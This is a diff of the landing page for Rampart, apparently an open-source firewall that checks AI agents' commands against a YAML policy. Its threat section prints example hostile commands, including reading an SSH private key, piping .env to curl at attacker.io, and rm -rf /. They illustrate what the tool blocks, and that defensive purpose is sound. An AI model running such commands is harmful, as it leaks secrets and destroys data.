+            50% { box-shadow: 0 0 18px rgba(34,197,94,0.22); }
+        }
+        .hero-feed { display: grid; gap: 10px; position: relative; }
+        .hero-feed-row {
+            display: grid;
+            grid-template-columns: 38px 56px 1fr;
+            gap: 10px;
+            align-items: baseline;
+            padding: 11px 12px;
+            border-radius: 14px;
+            background: rgba(9,9,11,0.44);
+            border: 1px solid rgba(255,255,255,0.05);
+            font-family: var(--mono);
+            font-size: 0.82rem;
+            opacity: 0;
+            transform: translateY(10px);
+            animation: heroRowIn 420ms ease forwards;
+        }
+        .hero-feed-row:nth-child(1) { animation-delay: 100ms; }
+        .hero-feed-row:nth-child(2) { animation-delay: 220ms; }
+        .hero-feed-row:nth-child(3) { animation-delay: 340ms; }
+        .hero-feed-row:nth-child(4) { animation-delay: 460ms; }
+        .hero-feed-row:nth-child(5) { animation-delay: 580ms; }
+        @keyframes heroRowIn {
+            to { opacity: 1; transform: translateY(0); }
+        }
+        .hero-feed-row .verdict { font-weight: 700; }
+        .hero-feed-row .tool { color: var(--text-dim); }
+        .hero-feed-row.allow .verdict { color: var(--green); }
+        .hero-feed-row.ask .verdict, .hero-feed-row.ask .cmd { color: var(--orange); }
+        .hero-feed-row.deny .verdict, .hero-feed-row.deny .cmd { color: var(--red); }
+        .hero-note {
+            position: relative;
+            margin-top: 16px;
+            padding-top: 16px;
+            border-top: 1px solid rgba(255,255,255,0.06);
             color: var(--text-bright);
-            font-family: 'Archivo', sans-serif;
-            white-space: nowrap;
-            padding: 2px 8px;
-            background: var(--surface-2);
-            border-radius: 4px;
-            border: 1px solid var(--border);
-            flex-shrink: 0;
+            font-size: 0.95rem;
         }
 
-        /* ── Footer ── */
-        footer {
-            padding: 40px 0 60px;
-            border-top: 1px solid var(--border);
+        .proof-band {
+            padding: 18px 0 12px;
+        }
+        .proof-line {
+            display: flex;
+            flex-wrap: wrap;
+            gap: 12px;
+            justify-content: center;
+            color: var(--text-dim);
+            font-family: var(--mono);
+            font-size: 0.8rem;
+            max-width: 1040px;
+            margin: 0 auto;
+        }
+        .proof-chip {
+            padding: 8px 12px;
+            border-radius: 999px;
+            border: 1px solid rgba(255,255,255,0.06);
+            background: rgba(255,255,255,0.03);
+            white-space: nowrap;
+        }
+
+        .threat-layout {
+            display: grid;
+            grid-template-columns: minmax(0, 0.92fr) minmax(0, 1.08fr);
+            gap: 34px;
+            align-items: start;
+            margin-top: 34px;
+        }
+        .threat-terminal {
+            padding: 24px;
+        }
+        .threat-commands {
+            display: grid;
+            gap: 12px;
+            font-family: var(--mono);
+            color: var(--red);
+            font-size: 0.92rem;
+        }
+        .threat-commands div {
+            padding: 14px 16px;
+            border-radius: 14px;
+            background: rgba(239,68,68,0.06);
+            border: 1px solid rgba(239,68,68,0.14);
+            opacity: 0;
+            transform: translateY(10px);
+        }
+        .threat-commands.reveal-visible div:nth-child(1) { animation: heroRowIn 360ms ease 80ms forwards; }
+        .threat-commands.reveal-visible div:nth-child(2) { animation: heroRowIn 360ms ease 180ms forwards; }
+        .threat-commands.reveal-visible div:nth-child(3) { animation: heroRowIn 360ms ease 280ms forwards; }
+        .platform-grid {
+            display: grid;
+            grid-template-columns: repeat(3, 1fr);
+            gap: 14px;
+        }
+        .platform-card {
+            padding: 18px;
+            border-radius: 18px;
+            background: rgba(255,255,255,0.03);
+            border: 1px solid rgba(255,255,255,0.06);
+        }
+        .platform-card h3 {
+            color: var(--heading);
+            font-size: 0.98rem;
+            margin-bottom: 8px;
+        }
+        .platform-card p { font-size: 0.9rem; }
+
+        .watch-shell {
+            padding: 26px;
+            max-width: 1040px;
+            margin: 0 auto;
+        }
+        .watch-bar {
+            display: flex;
+            align-items: center;
+            gap: 8px;
+            margin-bottom: 18px;
+        }
+        .dot { width: 10px; height: 10px; border-radius: 50%; }
+        .dot.red { background: #ff5f57; }
+        .dot.yellow { background: #febc2e; }
+        .dot.green { background: #28c840; }
+        .watch-title {
+            margin-left: 8px;
+            color: var(--text-dim);
+            font-family: var(--mono);
+            font-size: 0.76rem;
+        }
+        .watch-rows {
+            display: grid;
+            gap: 8px;
+        }
+        .watch-row {
+            display: grid;
+            grid-template-columns: 20px 70px 44px 1fr auto;
+            gap: 10px;
+            align-items: baseline;
+            padding: 8px 0;
+            font-family: var(--mono);
+            font-size: 0.82rem;
+        }
+        .watch-row .icon { text-align: center; }
+        .watch-row .time { color: var(--text-dim); }
+        .watch-row .tool { color: #8b949e; }
+        .watch-row .cmd { color: var(--text-bright); min-width: 0; overflow: hidden; text-overflow: ellipsis; white-space: nowrap; }
+        .watch-row .tag { color: var(--text-dim); font-size: 0.74rem; }
+        .watch-row.allow .icon { color: var(--green); }
+        .watch-row.ask .icon, .watch-row.ask .cmd { color: var(--orange); }
+        .watch-row.deny .icon, .watch-row.deny .cmd { color: var(--red); }
+        .watch-footer {
+            margin-top: 14px;
+            padding-top: 14px;
+            border-top: 1px solid rgba(255,255,255,0.06);
+            font-family: var(--mono);
+            font-size: 0.76rem;
+            color: var(--text-dim);
+        }
+
+        .stats-row {
+            display: grid;
+            grid-template-columns: repeat(4, 1fr);
+            gap: 14px;
+            max-width: 1040px;
+            margin: 0 auto;
+        }
+        .stat-card {
+            padding: 22px 18px;
+            border-radius: 20px;
+            background: rgba(255,255,255,0.035);
+            border: 1px solid rgba(255,255,255,0.06);
             text-align: center;
         }
-        footer p { color: var(--text); font-size: 0.85rem; }
-        footer a { color: var(--text-bright); text-decoration: none; }
-        footer a:hover { color: var(--accent); }
-        footer .footer-links {
-            display: flex;
-            justify-content: center;
-            gap: 24px;
-            margin-bottom: 16px;
-            flex-wrap: wrap;
+        .stat-num {
+            display: block;
+            color: var(--heading);
+            font-size: clamp(2rem, 4vw, 2.8rem);
+            font-weight: 800;
+            letter-spacing: -0.05em;
+            line-height: 1;
+        }
+        .stat-card:first-child .stat-num,
+        .stat-card:nth-child(3) .stat-num { color: var(--accent); }
+        .stat-label {
+            display: block;
+            margin-top: 8px;
+            color: var(--text-dim);
+            font-family: var(--mono);
+            font-size: 0.76rem;
         }
 
-        /* ── Responsive ── */
-        @media (max-width: 768px) {
-            .hero { padding: 60px 0 48px; }
-            .hero-grid { grid-template-columns: 1fr; }
-            .hero-card { order: -1; }
-            .pos-grid { grid-template-columns: 1fr; }
-            .threat-grid, .platform-grid, .yaml-layout, .mechanics-grid, .response-layout, .ecosystem-card { grid-template-columns: 1fr; }
-            .integration-row { grid-template-columns: 1fr; gap:6px; }
-            .integration-row.header { display:none; }
-            .example-grid { grid-template-columns: 1fr; }
-            .stats-row { grid-template-columns: repeat(2, 1fr); }
-            .feature-grid { grid-template-columns: 1fr 1fr; }
-            .feature-grid--five .feature-card:nth-child(n) { grid-column: span 1; }
-            nav .links a.hide-mobile { display: none; }
-            .watch-row { grid-template-columns: 20px 60px 36px 1fr; }
-            .watch-policy { display: none; }
-            .section-title { font-size: 1.6rem; }
+        .story-grid {
+            display: grid;
+            gap: 42px;
+            align-items: start;
         }
-        @media (max-width: 480px) {
-            .feature-grid, .stats-row { grid-template-columns: 1fr; }
-            .flow-row { grid-template-columns: 1fr; gap:8px; }
-            .hero h1 { font-size: 1.8rem; }
-            .hero-feed-row { grid-template-columns: 20px 46px 1fr; font-size: 0.72rem; }
-            .hero-buttons { flex-direction: column; align-items: stretch; gap: 10px; }
-            .hero-buttons .btn { justify-content: center; }
-            .hero-install { font-size: 0.78rem; padding: 12px 16px; }
-            .terminal-body { font-size: 0.72rem; padding: 16px; }
-            .agent-grid { grid-template-columns: repeat(2, 1fr); }
-            .install-card pre { font-size: 0.75rem; }
+        .story-copy {
+            display: grid;
+            gap: 16px;
+            max-width: 720px;
+        }
+        .story-copy .section-desc { margin-bottom: 10px; }
+        .story-points {
+            display: grid;
+            gap: 14px;
+        }
+        .story-point {
+            padding: 18px 20px;
+            border-radius: 18px;
+            background: rgba(255,255,255,0.03);
+            border: 1px solid rgba(255,255,255,0.05);
+        }
+        .story-point h3 {
+            color: var(--heading);
+            font-size: 1.02rem;
+            margin-bottom: 7px;
+        }
+        .story-flow-layout {
+            display: grid;
+            grid-template-columns: minmax(300px, 0.78fr) minmax(0, 1.08fr);
+            gap: 38px;
+            align-items: start;
+        }
+        .story-panel-wrap {
+            min-height: 165vh;
+            position: relative;
+        }
+        .story-panel {
+            position: sticky;
+            top: 104px;
+            padding: 20px;
+            max-width: none;
+            margin-left: 0;
+            z-index: 2;
+        }
+        .flow-panel {
+            display: grid;
+            gap: 10px;
+        }
+        .flow-row {
+            display: grid;
+            grid-template-columns: 84px 1fr auto;
+            gap: 14px;
+            align-items: center;
+            padding: 18px 18px;
+            border-radius: 18px;
+            border: 1px solid rgba(255,255,255,0.06);
+            background: rgba(9,9,11,0.32);
+            transition: border-color 220ms ease, transform 220ms ease, background 220ms ease;
+        }
+        .flow-row.active {
+            transform: translateY(-2px);
+            border-color: var(--accent-border);
+            background: rgba(255,99,146,0.08);
+            box-shadow: 0 0 0 1px rgba(255,99,146,0.08) inset;
+        }
+        .flow-label {
+            color: var(--accent);
+            font-family: var(--mono);
+            font-size: 0.72rem;
+            letter-spacing: 0.08em;
+            text-transform: uppercase;
+        }
+        .flow-main { color: var(--heading); font-weight: 700; }
+        .flow-sub { display: block; color: var(--text); font-size: 0.88rem; margin-top: 4px; }
+        .flow-chip {
+            font-family: var(--mono);
+            font-size: 0.72rem;
+            padding: 6px 10px;
+            border: 1px solid rgba(255,255,255,0.10);
+            border-radius: 999px;
+            color: var(--text-bright);
+        }
+        .flow-chip.allow { color: var(--green); border-color: rgba(34,197,94,0.22); }
+        .flow-chip.ask { color: var(--orange); border-color: rgba(245,158,11,0.24); }
+        .flow-chip.deny { color: var(--red); border-color: rgba(239,68,68,0.24); }
+        .flow-status {
+            margin-top: 16px;
+            padding-top: 16px;
+            border-top: 1px solid rgba(255,255,255,0.06);
+            display: flex;
+            justify-content: space-between;
+            gap: 14px;
+            font-family: var(--mono);
+            font-size: 0.76rem;
+            color: var(--text-dim);
+        }
+        .flow-status strong { color: var(--text-bright); }
+        .flow-steps {
+            display: grid;
+            gap: 18px;
+            padding-top: 28px;
+        }
+        .flow-step {
+            min-height: 34vh;
+            display: flex;
+            align-items: center;
+        }
+        .flow-step-copy {
+            max-width: 560px;
+        }
+        .flow-step-number {
+            color: var(--accent);
+            font-family: var(--mono);
+            font-size: 0.76rem;
+            letter-spacing: 0.08em;
+            text-transform: uppercase;
+            margin-bottom: 10px;
+        }
+        .flow-step h3 {
+            color: var(--heading);
+            font-size: 1.7rem;
+            letter-spacing: -0.03em;
+            margin-bottom: 10px;
+        }
+        .flow-step p {
+            color: var(--text);
+            font-size: 1rem;
+        }
+
+        .integrations-grid {
+            display: grid;
+            gap: 12px;
+            margin-top: 28px;
+            max-width: 1040px;
+        }
+        .integration-row {
+            display: grid;
+            grid-template-columns: 1.05fr 1.35fr 1fr 0.72fr;
+            gap: 16px;
+            padding: 16px 18px;
+            align-items: center;
+            border-radius: 18px;
+            background: rgba(255,255,255,0.03);
+            border: 1px solid rgba(255,255,255,0.06);
+            font-size: 0.92rem;
+        }
+        .integration-row > span { min-width: 0; }
+        .integration-row.header {
+            color: var(--text-dim);
+            font-family: var(--mono);
+            font-size: 0.72rem;
+            text-transform: uppercase;
+            letter-spacing: 0.08em;
+            background: transparent;
+        }
+        .integration-agent { color: var(--heading); font-weight: 700; }
+        .integration-code { color: var(--text-bright); font-family: var(--mono); font-size: 0.82rem; overflow: hidden; text-overflow: ellipsis; white-space: nowrap; }
+        .integration-path { color: var(--text); }
+        .integration-status { color: var(--green); font-family: var(--mono); }
+
+        .yaml-layout {
+            display: grid;
+            grid-template-columns: minmax(0, 0.9fr) minmax(0, 1.1fr);
+            gap: 32px;
+            align-items: start;
+        }
+        .yaml-block { overflow: hidden; }
+        .yaml-bar {
+            display: flex;
+            align-items: center;
+            gap: 8px;
+            padding: 12px 14px;
+            border-bottom: 1px solid rgba(255,255,255,0.06);
+            background: rgba(255,255,255,0.02);
+        }
+        .yaml-title { margin-left: 6px; color: var(--text-dim); font-family: var(--mono); font-size: 0.76rem; }
+        .yaml-block pre {
+            margin: 0;
+            padding: 20px 22px;
+            overflow: auto;
+            color: var(--text);
+            font-size: 0.84rem;
+            line-height: 1.68;
+        }
+        .yaml-k { color: var(--cyan); }
+        .yaml-s { color: var(--green); }
+        .yaml-a { color: var(--accent); }
+        .yaml-notes {
+            display: grid;
+            gap: 12px;
+            margin-top: 22px;
+        }
+        .yaml-note {
+            padding: 16px 18px;
+            border-radius: 16px;
+            background: rgba(255,255,255,0.03);
+            border: 1px solid rgba(255,255,255,0.05);
+        }
+        .yaml-note strong { color: var(--heading); display: block; margin-bottom: 6px; }
+
+        .ecosystem-card {
+            display: grid;
+            grid-template-columns: 1fr auto 1fr;
+            gap: 18px;
+            align-items: stretch;
+            margin-top: 26px;
+        }
+        .ecosystem-half {
+            padding: 26px;
+        }
+        .ecosystem-half h3 {
+            color: var(--heading);
+            font-size: 1.35rem;
+            margin-bottom: 10px;
+        }
+        .ecosystem-link {
+            display: flex;
+            align-items: center;
+            justify-content: center;
+            min-width: 88px;
+            color: var(--accent);
+            font-family: var(--mono);
+            font-size: 0.74rem;
+            letter-spacing: 0.08em;
+            text-transform: uppercase;
+        }
+        .ecosystem-link::before {
+            content: "";
+            width: 100%;
+            height: 1px;
+            background: linear-gradient(90deg, rgba(255,99,146,0.1), rgba(255,99,146,0.8), rgba(255,99,146,0.1));
+            box-shadow: 0 0 20px rgba(255,99,146,0.25);
+        }
+
+        .install-section {
+            text-align: center;
+        }
+        .install-tabs {
+            display: inline-flex;
+            padding: 5px;
+            border-radius: 999px;
+            border: 1px solid var(--border);
+            background: rgba(255,255,255,0.03);
+            margin: 26px 0 20px;
+        }
+        .install-tab {
+            padding: 10px 16px;
+            border-radius: 999px;
+            border: 0;
+            background: transparent;
+            color: var(--text);
+            cursor: pointer;
+            font-weight: 700;
+        }
+        .install-tab.active {
+            background: var(--accent);
+            color: #111;
+        }
+        .install-panel {
+            max-width: 640px;
+            margin: 0 auto;
+        }
+        .install-panel[hidden] { display: none; }
+        .install-card {
+            padding: 24px;
+            text-align: left;
+        }
+        .install-links {
+            display: flex;
+            gap: 14px;
+            justify-content: center;
+            flex-wrap: wrap;
+            margin-top: 14px;
+            font-size: 0.84rem;
+        }
+        .install-links a { color: var(--accent); text-decoration: none; }
+        .setup-box {
+            margin-top: 20px;
+            padding: 18px 20px;
+            text-align: left;
+            max-width: 760px;
+            margin-left: auto;
+            margin-right: auto;
+        }
+        .setup-box pre {
+            margin: 0;
+            overflow: auto;
+            font-family: var(--mono);
+            font-size: 0.8rem;
+            color: var(--text-bright);
+            line-height: 1.72;
+        }
+
+        footer {
+            padding: 44px 0 60px;
+            border-top: 1px solid rgba(255,255,255,0.06);
+        }
+        .footer-links {
+            display: flex;
+            justify-content: center;
+            flex-wrap: wrap;
+            gap: 22px;
+            margin-bottom: 16px;
+        }
+        footer a { color: var(--text-bright); text-decoration: none; }
+        footer a:hover { color: var(--accent); }
+        footer p { text-align: center; color: var(--text); font-size: 0.88rem; }
+
+        .reveal {
+            opacity: 0;
+            transform: translateY(24px);
+            transition: opacity 650ms ease, transform 650ms ease;
+        }
+        .reveal-visible {
+            opacity: 1;
+            transform: translateY(0);
+        }
+
+        @media (max-width: 980px) {
+            .hero-grid,
+            .threat-layout,
+            .yaml-layout,
+            .ecosystem-card,
+            .story-flow-layout { grid-template-columns: 1fr; }
+            .story-panel-wrap { min-height: auto; }
+            .story-panel { position: relative; top: 0; }
+            .flow-steps { padding-top: 24px; }
+            .ecosystem-link { min-width: auto; }
+            .ecosystem-link::before { width: 80px; }
+            .platform-grid,
+            .stats-row { grid-template-columns: 1fr 1fr; }
+        }
+        @media (min-width: 981px) {
+            .hero {
+                padding: 96px 0 42px;
+            }
+            .section {
+                padding: 118px 0;
+            }
+            .section.tight {
+                padding-top: 84px;
+                padding-bottom: 84px;
+            }
+            .hero-card {
+                transform: translateY(8px);
+            }
+        }
+        @media (max-width: 760px) {
+            .nav-links a.hide-mobile { display: none; }
+            .nav-links { gap: 10px; }
+            .nav-btn { padding: 8px 12px; }
+            .logo {
+                font-size: 1.55rem;
+                gap: 8px;
+            }
+            .hero { padding-top: 62px; }
+            .section { padding: 88px 0; }
+            .watch-row {
+                grid-template-columns: 20px auto auto;
+                grid-template-areas:
+                    "icon time tool"
+                    ". cmd cmd"
+                    ". tag tag";
+                gap: 4px 10px;
+                padding: 12px 0;
+                align-items: start;
+            }
+            .watch-row .icon { grid-area: icon; }
+            .watch-row .time { grid-area: time; }
+            .watch-row .tool { grid-area: tool; }
+            .watch-row .cmd {
+                grid-area: cmd;
+                white-space: normal;
+                overflow: visible;
+                text-overflow: clip;
+                word-break: break-word;
+                padding-top: 2px;
+            }
+            .watch-row .tag {
+                grid-area: tag;
+                padding-left: 2px;
+            }
+            .integration-row {
+                grid-template-columns: 1fr;
+                gap: 8px;
+                padding: 18px;
+            }
+            .integration-row.header { display: none; }
+            .integration-agent::before,
+            .integration-code::before,
+            .integration-path::before,
+            .integration-status::before {
+                display: block;
+                margin-bottom: 4px;
+                color: var(--text-dim);
+                font-family: var(--mono);
+                font-size: 0.68rem;
+                letter-spacing: 0.08em;
+                text-transform: uppercase;
+            }
+            .integration-agent::before { content: 'Agent'; }
+            .integration-code::before { content: 'Setup'; }
+            .integration-path::before { content: 'Enforcement'; }
+            .integration-status::before { content: 'Status'; }
+            .platform-grid,
+            .stats-row { grid-template-columns: 1fr; }
+            .proof-line {
+                justify-content: flex-start;
+                gap: 10px;
+                overflow-x: auto;
+                padding-bottom: 4px;
+                flex-wrap: nowrap;
+                -webkit-overflow-scrolling: touch;
+            }
+            .proof-line::-webkit-scrollbar { display: none; }
+            .eyebrow {
+                font-size: 0.68rem;
+                letter-spacing: 0.06em;
+                padding: 7px 11px;
+            }
+            .hero-meta {
+                gap: 8px;
+                flex-direction: column;
+                align-items: flex-start;
+            }
+            .hero-sub {
+                font-size: 1.02rem;
+                line-height: 1.62;
+                max-width: 32ch;
+            }
+            .hero-actions { flex-direction: column; align-items: flex-start; }
+            .btn { width: 100%; justify-content: center; }
+            .story-panel-wrap { min-height: auto; }
+            .story-panel {
+                position: relative;
+                top: 0;
+                max-width: none;
+                margin-left: 0;
+            }
+            .flow-steps { gap: 28px; padding-top: 22px; }
+            .flow-step { min-height: auto; }
+            .flow-status {
+                flex-direction: column;
+                align-items: flex-start;
+            }
+            .install-tabs {
+                width: 100%;
+                max-width: 420px;
+            }
+            .install-tab { flex: 1; }
+            .install-inline {
+                flex-direction: column;
+                align-items: flex-start;
+                gap: 10px;
+            }
+            .watch-shell { padding: 18px; }
+            .watch-title {
+                font-size: 0.68rem;
+                line-height: 1.4;
+            }
+            .setup-box { padding: 16px 16px; }
+        }
+        @media (max-width: 520px) {
+            .container, .container-narrow { padding: 0 18px; }
+            .logo { font-size: 1.42rem; }
+            .hero h1 {
+                font-size: 2.75rem;
+                line-height: 1.02;
+                letter-spacing: -0.05em;
+                padding-right: 0.1em;
+            }
+            .install-inline { width: 100%; justify-content: space-between; font-size: 0.8rem; }
+            .hero-feed-row { grid-template-columns: 28px 44px 1fr; font-size: 0.72rem; }
+            .flow-row { grid-template-columns: 1fr; }
+            .setup-box pre { font-size: 0.75rem; }
+            .nav-links a { font-size: 0.86rem; }
+            .nav-btn { padding: 8px 10px; }
+            .hero-card { padding: 18px; }
+            .hero-sub {
+                font-size: 0.98rem;
+                max-width: 28ch;
+            }
         }
         @media (prefers-reduced-motion: reduce) {
-            .watch-rows > .watch-row { opacity: 1; animation: none; }
+            html { scroll-behavior: auto; }
+            *, *::before, *::after {
+                animation: none !important;
+                transition: none !important;
+            }
+            .reveal,
+            .hero-feed-row,
+            .threat-commands div { opacity: 1; transform: none; }
         }
     </style>
 </head>
 <body>
-
 <nav>
     <div class="inner">
         <a href="/" class="logo">
@@ -759,53 +1085,43 @@
             </svg>
             rampart
         </a>
-        <div class="links">
+        <div class="nav-links">
             <a href="https://docs.rampart.sh">Docs</a>
             <a href="https://docs.rampart.sh/reference/threat-model/" class="hide-mobile">Threat Model</a>
-            <a href="https://github.com/peg/rampart" class="btn-nav">
-                <svg width="16" height="16" viewBox="0 0 24 24" fill="currentColor" style="vertical-align:-2px; margin-right:4px;"><path d="M12 0c-6.626 0-12 5.373-12 12 0 5.302 3.438 9.8 8.207 11.387.599.111.793-.261.793-.577v-2.234c-3.338.726-4.033-1.416-4.033-1.416-.546-1.387-1.333-1.756-1.333-1.756-1.089-.745.083-.729.083-.729 1.205.084 1.839 1.237 1.839 1.237 1.07 1.834 2.807 1.304 3.492.997.107-.775.418-1.305.762-1.604-2.665-.305-5.467-1.334-5.467-5.931 0-1.311.469-2.381 1.236-3.221-.124-.303-.535-1.524.117-3.176 0 0 1.008-.322 3.301 1.23.957-.266 1.983-.399 3.003-.404 1.02.005 2.047.138 3.006.404 2.291-1.552 3.297-1.23 3.297-1.23.653 1.653.242 2.874.118 3.176.77.84 1.235 1.911 1.235 3.221 0 4.609-2.807 5.624-5.479 5.921.43.372.823 1.102.823 2.222v3.293c0 .319.192.694.801.576 4.765-1.589 8.199-6.086 8.199-11.386 0-6.627-5.373-12-12-12z"/></svg>
+            <a href="https://github.com/peg/rampart" class="nav-btn">
+                <svg width="16" height="16" viewBox="0 0 24 24" fill="currentColor"><path d="M12 0c-6.626 0-12 5.373-12 12 0 5.302 3.438 9.8 8.207 11.387.599.111.793-.261.793-.577v-2.234c-3.338.726-4.033-1.416-4.033-1.416-.546-1.387-1.333-1.756-1.333-1.756-1.089-.745.083-.729.083-.729 1.205.084 1.839 1.237 1.839 1.237 1.07 1.834 2.807 1.304 3.492.997.107-.775.418-1.305.762-1.604-2.665-.305-5.467-1.334-5.467-5.931 0-1.311.469-2.381 1.236-3.221-.124-.303-.535-1.524.117-3.176 0 0 1.008-.322 3.301 1.23.957-.266 1.983-.399 3.003-.404 1.02.005 2.047.138 3.006.404 2.291-1.552 3.297-1.23 3.297-1.23.653 1.653.242 2.874.118 3.176.77.84 1.235 1.911 1.235 3.221 0 4.609-2.807 5.624-5.479 5.921.43.372.823 1.102.823 2.222v3.293c0 .319.192.694.801.576 4.765-1.589 8.199-6.086 8.199-11.386 0-6.627-5.373-12-12-12z"/></svg>
                 GitHub
             </a>
         </div>
     </div>
 </nav>
 
-<!-- Hero -->
 <section class="hero">
     <div class="container hero-grid">
         <div>
-            <div class="badges">
-                <span class="badge">v0.9.19 · Codex and OpenClaw hardening</span>
-                <span class="badge badge-neutral">Open Source · Apache 2.0</span>
-                <a href="https://github.com/peg/rampart" class="badge badge-neutral star-badge" style="text-decoration:none; display:inline-flex; align-items:center; gap:6px;">
-                    <svg width="14" height="14" viewBox="0 0 24 24" fill="var(--orange)" stroke="none"><path d="M12 2l3.09 6.26L22 9.27l-5 4.87 1.18 6.88L12 17.77l-6.18 3.25L7 14.14 2 9.27l6.91-1.01L12 2z"/></svg>
-                    <span id="star-count" style="color:var(--text-bright);font-weight:600;">GitHub</span>
-                    <span style="color:var(--text);">repo</span>
-                </a>
-            </div>
-            <h1>Your agent has root.<br><span class="accent">That's the problem.</span></h1>
-            <p class="sub">
-                Rampart sits between your agent and your system. Every command, file access, and network request is evaluated against your YAML policy before it executes. One Go binary. No cloud. No latency your agent can feel.
-            </p>
-            <div class="hero-install" onclick="copyInstall(this)" title="Click to copy">
-                <span class="prompt">$</span> curl -fsSL https://rampart.sh/install | bash
-                <span class="install-copy-hint">click to copy</span>
-            </div>
-            <div class="hero-buttons">
-                <a href="#install" class="btn btn-primary">Install →</a>
-                <a href="https://github.com/peg/rampart" class="btn btn-ghost">
-                    <svg width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"><path d="M9 19c-5 1.5-5-2.5-7-3m14 6v-3.87a3.37 3.37 0 0 0-.94-2.61c3.14-.35 6.44-1.54 6.44-7A5.44 5.44 0 0 0 20 4.77 5.07 5.07 0 0 0 19.91 1S18.73.65 16 2.48a13.38 13.38 0 0 0-7 0C6.27.65 5.09 1 5.09 1A5.07 5.07 0 0 0 5 4.77a5.44 5.44 0 0 0-1.5 3.78c0 5.42 3.3 6.61 6.44 7A3.37 3.37 0 0 0 9 18.13V22"/></svg>
-                    View Source
-                </a>
-            </div>
-            <div class="hero-proof">
-                <span>Claude Code</span><span>Codex CLI</span><span>OpenClaw</span><span>MCP</span><span>Linux · macOS · Windows</span>
+            <div class="eyebrow"><span class="eyebrow-dot"></span>v0.9.19 · open source · local-first</div>
+            <h1>Your agent has root.<br><span class="accent">That’s the problem.</span></h1>
+            <p class="hero-sub">Rampart sits between your agent and your system. It evaluates commands, file access, and network requests against your YAML policy before they run. Local-first. No cloud dependency.</p>
+            <div class="install-cluster">
+                <div class="install-inline" onclick="copyCode(this)" title="Click to copy">
+                    <span class="prompt">$</span>
+                    <span>curl -fsSL https://rampart.sh/install | bash</span>
+                    <span class="copy-hint">click to copy</span>
+                </div>
+                <div class="hero-meta">
+                    <span>Installs to <code>~/.local/bin</code> by default on macOS/Linux. Usually no sudo required.</span>
+                    <span>Claude Code · Codex CLI · OpenClaw · MCP</span>
+                </div>
+                <div class="hero-actions">
+                    <a href="#install" class="btn btn-primary">Install Rampart</a>
+                    <a href="#watch" class="btn btn-ghost">See it work</a>
+                </div>
             </div>
         </div>
-        <div class="hero-card" aria-label="Rampart policy decisions preview">
-            <div class="hero-card-top">
-                <div class="hero-card-title">rampart watch · agent-01</div>
-                <div class="hero-card-live">● live</div>
+        <div class="hero-card panel reveal">
+            <div class="hero-card-bar">
+                <span>rampart watch · agent-01</span>
+                <span class="live-pill">● live</span>
             </div>
             <div class="hero-feed">
                 <div class="hero-feed-row allow"><span class="verdict">✔</span><span class="tool">exec</span><span class="cmd">git status</span></div>
@@ -814,190 +1130,144 @@
                 <div class="hero-feed-row deny"><span class="verdict">●</span><span class="tool">read</span><span class="cmd">~/.ssh/id_rsa</span></div>
                 <div class="hero-feed-row deny"><span class="verdict">●</span><span class="tool">exec</span><span class="cmd">rm -rf /</span></div>
             </div>
-            <div class="hero-card-callout">The agent keeps building. The dangerous stuff stops before it runs.</div>
+            <div class="hero-note">The agent keeps building. The dangerous stuff stops before it runs.</div>
         </div>
     </div>
 </section>
 
-<!-- Threat -->
-<section class="threat">
+<section class="proof-band tight">
     <div class="container">
+        <div class="proof-line">
+            <span class="proof-chip">blocks credential reads</span>
+            <span class="proof-chip">stops exfiltration patterns</span>
+            <span class="proof-chip">hash-chained local audit</span>
+            <span class="proof-chip">Claude Code · Codex · Cline · OpenClaw</span>
+            <span class="proof-chip"><a href="https://github.com/peg/rampart" id="star-count" style="text-decoration:none; color:inherit;">GitHub repo</a></span>
+        </div>
+    </div>
+</section>
+
+<section class="section">
+    <div class="container reveal">
         <div class="section-label">The real threat</div>
-        <h2 class="section-title">What your agent can do right now</h2>
-        <p class="section-desc">Claude Code's <code>--dangerously-skip-permissions</code>. Codex's <code>--full-auto</code> mode. Fast agent workflows increasingly assume full local trust. Here's what that actually means.</p>
-        <div class="threat-grid">
-            <div>
-                <div class="threat-card">
+        <h2 class="section-title">Fast agent workflows increasingly assume full local trust.</h2>
+        <p class="section-desc">Claude Code’s <code>--dangerously-skip-permissions</code>. Codex’s <code>--full-auto</code>. That is not a theoretical problem. It means your agent can quietly read secrets, exfiltrate them, or trash a machine while trying to finish the task.</p>
+        <div class="threat-layout">
+            <div class="threat-terminal panel reveal">
+                <div class="threat-commands reveal">
                     <div>$ cat ~/.ssh/id_rsa</div>
                     <div>$ cat .env | curl -X POST https://attacker.io/collect -d @-</div>
                     <div>$ rm -rf /</div>
                 </div>
-                <p class="threat-note">No guardrail in the execution path. No approval gate. No tamper-evident audit trail after the fact.</p>
+                <p style="margin-top:18px;color:var(--text-dim);">No guardrail in the execution path. No approval gate. No tamper-evident audit trail after the fact.</p>
             </div>
-            <div class="platform-grid" style="margin-top:0;">
-                <div class="platform-card">
-                    <h3>Linux: strongest path</h3>
-                    <p><code>LD_PRELOAD</code>, wrappers, hooks, and file/network policy enforcement are the happy path.</p>
-                </div>
-                <div class="platform-card">
-                    <h3>macOS: works, with caveats</h3>
-                    <p><code>DYLD_INSERT_LIBRARIES</code> has SIP boundaries. Homebrew/user-installed binaries work best.</p>
-                </div>
-                <div class="platform-card">
-                    <h3>Windows: hooks, not preload</h3>
-                    <p>Use Claude/Cline/API/MCP-style integrations. Codex preload/wrap and OpenClaw plugin setup are not the Windows story.</p>
-                </div>
+            <div class="platform-grid reveal">
+                <div class="platform-card interactive"><h3>Linux: strongest path</h3><p><code>LD_PRELOAD</code>, wrappers, hooks, and file/network policy enforcement are the happy path.</p></div>
+                <div class="platform-card interactive"><h3>macOS: works, with caveats</h3><p><code>DYLD_INSERT_LIBRARIES</code> has SIP boundaries. Homebrew and user-installed binaries work best.</p></div>
+                <div class="platform-card interactive"><h3>Windows: hooks, not preload</h3><p>Use Claude/Cline/API/MCP-style integrations. Codex preload and OpenClaw plugin setup are not the Windows story.</p></div>
             </div>
         </div>
     </div>
 </section>
 
-<!-- Terminal Demo with Profile Selector -->
-<section class="terminal-section">
-    <div class="container">
-        <div class="policy-tabs" style="display:flex; flex-wrap:wrap; gap:8px; justify-content:center; margin-bottom:20px;">
-            <button class="policy-tab active" onclick="switchProfile('standard',this)">standard.yaml</button>
-            <button class="policy-tab" onclick="switchProfile('paranoid',this)">paranoid.yaml</button>
-            <button class="policy-tab" onclick="switchProfile('monitor',this)">monitor mode</button>
-        </div>
-        <div class="terminal">
-            <div class="terminal-bar">
-                <div class="terminal-dot"></div>
-                <div class="terminal-dot"></div>
-                <div class="terminal-dot"></div>
-                <div class="terminal-title">rampart watch</div>
